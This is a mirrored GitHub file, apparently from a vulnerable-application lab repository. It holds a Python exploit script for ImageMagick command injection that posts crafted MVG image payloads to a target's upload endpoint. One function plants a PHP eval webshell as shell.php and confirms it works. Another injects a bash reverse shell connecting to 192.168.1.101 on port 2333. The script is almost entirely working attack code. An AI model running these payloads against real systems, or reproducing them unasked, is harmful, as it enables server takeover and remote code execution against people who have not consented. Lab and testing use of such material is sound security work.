mirror of
https://github.com/Medicean/VulApps.git
synced 2025-06-21 10:20:20 +00:00
42 lines
1.1 KiB
Bash
42 lines
1.1 KiB
Bash
![]() |
#!/usr/bin/env python
|
||
|
# coding:utf-8
|
||
|
|
||
|
import requests
|
||
|
import base64
|
||
|
|
||
|
|
||
|
def doPost(url, data):
|
||
|
post_data = {"img": base64.b64encode(data)}
|
||
|
try:
|
||
|
requests.post(url + "/poc.php", data=post_data, timeout=1)
|
||
|
except:
|
||
|
pass
|
||
|
|
||
|
|
||
|
# 写 webshell
|
||
|
def writeshell(url):
|
||
|
writeshell = '''push graphic-context
|
||
|
viewbox 0 0 640 480
|
||
|
fill 'url(https://example.com/1.jpg"|echo \\'<?php eval($_POST[\\'ant\\']);?>\\' > shell.php")'
|
||
|
pop graphic-context
|
||
|
'''
|
||
|
doPost(url, writeshell)
|
||
|
resp2 = requests.post(url + "/shell.php", data={"ant": "echo md5(123);"})
|
||
|
if resp2.status_code == 200 and "202cb962ac59075b964b07152d234b70" in resp2.content:
|
||
|
print "WebShell: " + url + "shell.php"
|
||
|
|
||
|
def reverse_shell(url):
|
||
|
reverse_shell = """push graphic-context
|
||
|
viewbox 0 0 640 480
|
||
|
fill 'url(https://example.com/1.jpg"|bash -i >& /dev/tcp/192.168.1.101/2333 0>&1")'
|
||
|
pop graphic-context"""
|
||
|
|
||
|
# 反弹 shell
|
||
|
doPost(url, reverse_shell)
|
||
|
|
||
|
if __name__ == '__main__':
|
||
|
# 写 webshell
|
||
|
writeshell("http://127.0.0.1:8000/")
|
||
|
# 反弹 shell
|
||
|
# reverse_shell("http://127.0.0.1:8000/")
|